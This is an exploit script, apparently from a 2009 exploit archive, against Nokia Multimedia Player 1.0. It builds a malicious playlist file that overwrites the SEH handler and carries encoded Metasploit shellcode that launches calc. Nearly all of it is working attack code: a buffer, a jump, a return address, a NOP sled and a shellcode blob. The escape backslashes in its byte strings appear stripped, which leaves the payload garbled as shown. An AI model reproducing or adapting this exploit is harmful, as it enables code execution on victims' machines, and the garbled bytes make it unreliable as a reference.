#usage: exploit.py
print "**************************************************************************"
print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploitn"
print " Founder : 0in"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print "**************************************************************************"
         	

			
buff = "x41" * 1880

next_seh = "xEBx06x41x41"

nops = "x90"*19

seh = "x0ExD2x8Ex01" #yes universal :D




# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
shellcode = (
	"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
	"x49x49x49x49x49x49x49x49x49x49x48x49x51x5ax6ax67"
	"x58x50x30x42x30x42x6bx42x41x77x41x42x32x42x41x32"
	"x41x41x30x41x41x58x38x42x42x50x75x6bx59x79x6cx6b"
	"x58x37x34x53x30x35x50x53x30x6cx4bx41x55x47x4cx6c"
	"x4bx51x6cx63x35x54x38x77x71x7ax4fx6ex6bx70x4fx74"
	"x58x4ex6bx43x6fx37x50x43x31x5ax4bx47x39x4ex6bx37"
	"x44x6cx4bx45x51x58x6ex37x41x6bx70x6cx59x6cx6cx4f"
	"x74x6fx30x62x54x47x77x6bx71x59x5ax76x6dx74x41x6b"
	"x72x58x6bx69x64x65x6bx41x44x47x54x34x44x44x35x38"
	"x65x6ex6bx33x6fx31x34x37x71x6ax4bx51x76x6ex6bx44"
	"x4cx42x6bx6ex6bx43x6fx57x6cx55x51x6ax4bx4cx4bx47"
	"x6cx4ex6bx75x51x4ax4bx4ex69x31x4cx66x44x37x74x4f"
	"x33x55x61x4fx30x30x64x6ex6bx77x30x36x50x4ex65x39"
	"x50x31x68x64x4cx6cx4bx73x70x36x6cx6ex6bx30x70x37"
	"x6cx6cx6dx4ex6bx45x38x45x58x58x6bx73x39x6ex6bx4b"
	"x30x4ex50x75x50x73x30x63x30x6cx4bx45x38x65x6cx31"
	"x4fx30x31x4cx36x75x30x32x76x6dx59x59x68x6cx43x4b"
	"x70x41x6bx46x30x45x38x48x70x4ex6ax65x54x43x6fx71"
	"x78x4fx68x59x6ex4cx4ax76x6ex52x77x6bx4fx6bx57x72"
	"x43x53x51x30x6cx52x43x77x70x67"
    )

	
exploit = buff + next_seh + seh + nops + shellcode
	
try:
    out_file = open("nokia.npl",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!n"
except:
    print "Error"

# www.Syue.com [2009-03-09]